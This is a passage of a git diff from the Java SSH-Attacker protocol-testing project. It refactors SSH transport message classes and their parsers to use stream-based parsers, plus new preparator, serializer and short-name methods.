kex.getCiphertextLength()); + }*/ + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessageParser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessagePreparator( + context.getChooser(), this, kex.getCombiner()); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessageSerializer(this, kex.getCombiner()); + } + + @Override + public String toShortString() { + return "HYB_KEX_REPL"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/IgnoreMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/IgnoreMessage.java index ee73458ba..48a69d3eb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/IgnoreMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/IgnoreMessage.java @@ -10,9 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.IgnoreMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.IgnoreMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.IgnoreMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.IgnoreMessageSerializer; +import java.io.InputStream; public class IgnoreMessage extends SshMessage { @@ -59,6 +63,31 @@ public void setData(byte[] data, boolean adjustLengthField) { @Override public IgnoreMessageHandler getHandler(SshContext context) { - return new IgnoreMessageHandler(context, this); + return new IgnoreMessageHandler(context); + } + + @Override + public IgnoreMessageParser getParser(SshContext context, InputStream stream) { + return new IgnoreMessageParser(stream); + } + + /*@Override + public IgnoreMessageParser getParser(byte[] array, int startPosition) { + return new IgnoreMessageParser(array, startPosition); + }*/ + + @Override + public IgnoreMessagePreparator getPreparator(SshContext context) { + return new IgnoreMessagePreparator(context.getChooser(), this); + } + + @Override + public IgnoreMessageSerializer getSerializer(SshContext context) { + return new IgnoreMessageSerializer(this); + } + + @Override + public String toShortString() { + return "IGNORE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java index deb8f2fda..c4a01849b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java @@ -13,10 +13,14 @@ import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.KeyExchangeInitMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.KeyExchangeInitMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.KeyExchangeInitMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.KeyExchangeInitMessageSerializer; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import java.util.List; import java.util.stream.Collectors; @@ -857,6 +861,26 @@ public void setReserved(int reserved) { @Override public KeyExchangeInitMessageHandler getHandler(SshContext context) { - return new KeyExchangeInitMessageHandler(context, this); + return new KeyExchangeInitMessageHandler(context); + } + + @Override + public KeyExchangeInitMessageParser getParser(SshContext context, InputStream stream) { + return new KeyExchangeInitMessageParser(stream); + } + + @Override + public KeyExchangeInitMessagePreparator getPreparator(SshContext context) { + return new KeyExchangeInitMessagePreparator(context.getChooser(), this); + } + + @Override + public KeyExchangeInitMessageSerializer getSerializer(SshContext context) { + return new KeyExchangeInitMessageSerializer(this); + } + + @Override + public String toShortString() { + return "KEX_INIT"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewKeysMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewKeysMessage.java index b116219cb..df00f3bf5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewKeysMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewKeysMessage.java @@ -7,14 +7,38 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.NewKeysMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.NewKeysMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.NewKeysMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.NewKeysMessageSerializer; +import java.io.InputStream; public class NewKeysMessage extends SshMessage { @Override public NewKeysMessageHandler getHandler(SshContext context) { - return new NewKeysMessageHandler(context, this); + return new NewKeysMessageHandler(context); + } + + @Override + public NewKeysMessageParser getParser(SshContext context, InputStream stream) { + return new NewKeysMessageParser(stream); + } + + @Override + public NewKeysMessagePreparator getPreparator(SshContext context) { + return new NewKeysMessagePreparator(context.getChooser(), this); + } + + @Override + public NewKeysMessageSerializer getSerializer(SshContext context) { + return new NewKeysMessageSerializer(this); + } + + @Override + public String toShortString() { + return "NEW_KEYS"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangeDoneMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangeDoneMessage.java index dd5902df5..47bf1f6b1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangeDoneMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangeDoneMessage.java @@ -10,10 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; -import de.rub.nds.sshattacker.core.protocol.common.SshMessage; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.handler.RsaKeyExchangeDoneMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.RsaKeyExchangeDoneMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.RsaKeyExchangeDoneMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.RsaKeyExchangeDoneMessageSerializer; +import java.io.InputStream; public class RsaKeyExchangeDoneMessage extends SshMessage implements ExchangeHashSignatureMessage { @@ -70,6 +73,27 @@ public void setSignature(byte[] signature, boolean adjustLengthField) { @Override public SshMessageHandler getHandler(SshContext context) { - return new RsaKeyExchangeDoneMessageHandler(context, this); + return new RsaKeyExchangeDoneMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new RsaKeyExchangeDoneMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new RsaKeyExchangeDoneMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new RsaKeyExchangeDoneMessageSerializer(this); + } + + @Override + public String toShortString() { + return "RSA_KEX_DONE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangePubkeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangePubkeyMessage.java index 5efc903e0..dda2d06c9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangePubkeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangePubkeyMessage.java @@ -15,10 +15,13 @@ import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.crypto.util.PublicKeyHelper; -import de.rub.nds.sshattacker.core.protocol.common.SshMessage; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.handler.RsaKeyExchangePubkeyMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.RsaKeyExchangePubkeyMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.RsaKeyExchangePubkeyMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.RsaKeyExchangePubkeyMessageSerializer; +import java.io.InputStream; import java.math.BigInteger; import java.security.interfaces.RSAPublicKey; @@ -148,6 +151,28 @@ public BigInteger getPublicExponent() { @Override public SshMessageHandler getHandler(SshContext context) { - return new RsaKeyExchangePubkeyMessageHandler(context, this); + return new RsaKeyExchangePubkeyMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new RsaKeyExchangePubkeyMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new RsaKeyExchangePubkeyMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + // TODO: Implement Serializer + return new RsaKeyExchangePubkeyMessageSerializer(this); + } + + @Override + public String toShortString() { + return "RSA_PUBKEY_KEX"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangeSecretMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangeSecretMessage.java index 76b6b47e7..38baf16d0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangeSecretMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/RsaKeyExchangeSecretMessage.java @@ -10,10 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; -import de.rub.nds.sshattacker.core.protocol.common.SshMessage; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.handler.RsaKeyExchangeSecretMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.RsaKeyExchangeSecretMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.RsaKeyExchangeSecretMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.RsaKeyExchangeSecretMessageSerializer; +import java.io.InputStream; public class RsaKeyExchangeSecretMessage extends SshMessage { @@ -59,6 +62,27 @@ public void setEncryptedSecret(byte[] encryptedSecret, boolean adjustLengthField @Override public SshMessageHandler getHandler(SshContext context) { - return new RsaKeyExchangeSecretMessageHandler(context, this); + return new RsaKeyExchangeSecretMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new RsaKeyExchangeSecretMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new RsaKeyExchangeSecretMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new RsaKeyExchangeSecretMessageSerializer(this); + } + + @Override + public String toShortString() { + return "RSA_KEX_SECRET"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceAcceptMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceAcceptMessage.java index 45d924fe2..5e9136857 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceAcceptMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceAcceptMessage.java @@ -11,9 +11,13 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.ServiceType; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.ServiceAcceptMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.ServiceAcceptMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.ServiceAcceptMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.ServiceAcceptMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class ServiceAcceptMessage extends SshMessage { @@ -72,6 +76,26 @@ public void setServiceName(ServiceType serviceType, boolean adjustLengthField) { @Override public ServiceAcceptMessageHandler getHandler(SshContext context) { - return new ServiceAcceptMessageHandler(context, this); + return new ServiceAcceptMessageHandler(context); + } + + @Override + public ServiceAcceptMessageParser getParser(SshContext context, InputStream stream) { + return new ServiceAcceptMessageParser(stream); + } + + @Override + public ServiceAcceptMessagePreparator getPreparator(SshContext context) { + return new ServiceAcceptMessagePreparator(context.getChooser(), this); + } + + @Override + public ServiceAcceptMessageSerializer getSerializer(SshContext context) { + return new ServiceAcceptMessageSerializer(this); + } + + @Override + public String toShortString() { + return "SVC_ACCEPT"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceRequestMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceRequestMessage.java index e7fe4223a..9507289b3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceRequestMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceRequestMessage.java @@ -11,9 +11,13 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.ServiceType; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.ServiceRequestMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.ServiceRequestMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.ServiceRequestMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.ServiceRequestMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class ServiceRequestMessage extends SshMessage { @@ -72,6 +76,26 @@ public void setServiceName(ServiceType serviceType, boolean adjustLengthField) { @Override public ServiceRequestMessageHandler getHandler(SshContext context) { - return new ServiceRequestMessageHandler(context, this); + return new ServiceRequestMessageHandler(context); + } + + @Override + public ServiceRequestMessageParser getParser(SshContext context, InputStream stream) { + return new ServiceRequestMessageParser(stream); + } + + @Override + public ServiceRequestMessagePreparator getPreparator(SshContext context) { + return new ServiceRequestMessagePreparator(context.getChooser(), this); + } + + @Override + public ServiceRequestMessageSerializer getSerializer(SshContext context) { + return new ServiceRequestMessageSerializer(this); + } + + @Override + public String toShortString() { + return "SVC_REQ"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnimplementedMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnimplementedMessage.java index ab8805ce0..48034ae2f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnimplementedMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnimplementedMessage.java @@ -9,9 +9,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.UnimplementedMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.UnimplementedMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.UnimplementedMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.UnimplementedMessageSerializer; +import java.io.InputStream; public class UnimplementedMessage extends SshMessage { @@ -32,6 +36,26 @@ public void setSequenceNumber(int sequenceNumber) { @Override public UnimplementedMessageHandler getHandler(SshContext context) { - return new UnimplementedMessageHandler(context, this); + return new UnimplementedMessageHandler(context); + } + + @Override + public UnimplementedMessageParser getParser(SshContext context, InputStream stream) { + return new UnimplementedMessageParser(stream); + } + + @Override + public UnimplementedMessagePreparator getPreparator(SshContext context) { + return new UnimplementedMessagePreparator(context.getChooser(), this); + } + + @Override + public UnimplementedMessageSerializer getSerializer(SshContext context) { + return new UnimplementedMessageSerializer(this); + } + + @Override + public String toShortString() { + return "UNIMPLEMENTED_MESSAGE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnknownMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnknownMessage.java index 75e11d1e1..0423dd920 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnknownMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnknownMessage.java @@ -10,9 +10,14 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.transport.handler.UnknownMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.UnknownMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.UnknownMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.UnknownMessageSerializer; +import java.io.InputStream; public class UnknownMessage extends SshMessage { @@ -40,6 +45,26 @@ public String toCompactString() { @Override public UnknownMessageHandler getHandler(SshContext context) { - return new UnknownMessageHandler(context, this); + return new UnknownMessageHandler(context); + } + + @Override + public UnknownMessageParser getParser(SshContext context, InputStream stream) { + return new UnknownMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new UnknownMessagePreparator(context.getChooser(), this); + } + + @Override + public UnknownMessageSerializer getSerializer(SshContext context) { + return new UnknownMessageSerializer(this); + } + + @Override + public String toShortString() { + return "UNKNOW_MESSAEG"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java index 5e71baab2..28c801582 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java @@ -10,9 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.CharConstants; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.VersionExchangeMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.VersionExchangeMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.VersionExchangeMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.VersionExchangeMessageSerializer; +import java.io.InputStream; public class VersionExchangeMessage extends ProtocolMessage { @@ -71,11 +75,31 @@ public void setEndOfMessageSequence(String endOfMessageSequence) { @Override public VersionExchangeMessageHandler getHandler(SshContext context) { - return new VersionExchangeMessageHandler(context, this); + return new VersionExchangeMessageHandler(context); } @Override public String toCompactString() { return this.getClass().getSimpleName(); } + + @Override + public VersionExchangeMessageParser getParser(SshContext context, InputStream stream) { + return new VersionExchangeMessageParser(stream); + } + + @Override + public VersionExchangeMessagePreparator getPreparator(SshContext context) { + return new VersionExchangeMessagePreparator(context.getChooser(), this); + } + + @Override + public VersionExchangeMessageSerializer getSerializer(SshContext context) { + return new VersionExchangeMessageSerializer(this); + } + + @Override + public String toShortString() { + return "VESION_EXCHANGE"; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java index 2926fa397..74f0ad1d9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.CharConstants; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,15 @@ public class AsciiMessageParser extends ProtocolMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public AsciiMessageParser(final byte[] array) { + /*public AsciiMessageParser(final byte[] array) { super(array); } public AsciiMessageParser(final byte[] array, final int startPosition) { super(array, startPosition); + }*/ + public AsciiMessageParser(InputStream stream) { + super(stream); } @Override @@ -30,9 +34,14 @@ protected AsciiMessage createMessage() { return new AsciiMessage(); } + public void parse(AsciiMessage message) { + LOGGER.debug("Parsing ApplicationMessage"); + parseProtocolMessageContents(); + } + private void parseText() { // parse till CR NL (and remove them) - String result = this.parseStringTill(new byte[] {CharConstants.NEWLINE}); + String result = this.parseStringTill(CharConstants.NEWLINE); if (result.endsWith("\r\n")) { message.setEndOfMessageSequence("\r\n"); result = result.substring(0, result.length() - 2); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java index 801537a61..9a65299e6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java @@ -13,6 +13,7 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DebugMessage; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -21,12 +22,22 @@ public class DebugMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public DebugMessageParser(byte[] array) { - super(array); + /* + public DebugMessageParser(byte[] array) { + super(array); + } + public DebugMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public DebugMessageParser(InputStream stream) { + super(stream); } - public DebugMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(DebugMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java index 57c9bfc21..e84b3a639 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeGroupMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -19,12 +20,16 @@ public class DhGexKeyExchangeGroupMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public DhGexKeyExchangeGroupMessageParser(byte[] array) { + /* public DhGexKeyExchangeGroupMessageParser(byte[] array) { super(array); } public DhGexKeyExchangeGroupMessageParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + + public DhGexKeyExchangeGroupMessageParser(InputStream stream) { + super(stream); } @Override @@ -57,4 +62,9 @@ protected void parseMessageSpecificContents() { parseGroupModulus(); parseGroupGenerator(); } + + @Override + public void parse(DhGexKeyExchangeGroupMessage message) { + parseMessageSpecificContents(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java index e9570b3ac..f87e8a651 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeInitMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,12 +19,17 @@ public class DhGexKeyExchangeInitMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public DhGexKeyExchangeInitMessageParser(byte[] array) { - super(array); - } - - public DhGexKeyExchangeInitMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + /* + public DhGexKeyExchangeInitMessageParser(byte[] array) { + super(array); + } + public DhGexKeyExchangeInitMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public DhGexKeyExchangeInitMessageParser(InputStream stream) { + super(stream); } @Override @@ -45,4 +51,9 @@ public void parseEphemeralPublicKey() { protected void parseMessageSpecificContents() { parseEphemeralPublicKey(); } + + @Override + public void parse(DhGexKeyExchangeInitMessage message) { + parseMessageSpecificContents(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java index ba4cb9ee1..e71018c5f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeOldRequestMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,12 +19,17 @@ public class DhGexKeyExchangeOldRequestMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public DhGexKeyExchangeOldRequestMessageParser(byte[] array) { - super(array); - } - - public DhGexKeyExchangeOldRequestMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + /* + public DhGexKeyExchangeOldRequestMessageParser(byte[] array) { + super(array); + } + public DhGexKeyExchangeOldRequestMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public DhGexKeyExchangeOldRequestMessageParser(InputStream stream) { + super(stream); } @Override @@ -40,4 +46,9 @@ public void parsePreferredGroupSize() { protected void parseMessageSpecificContents() { parsePreferredGroupSize(); } + + @Override + public void parse(DhGexKeyExchangeOldRequestMessage message) { + parseMessageSpecificContents(); + } } diff --git 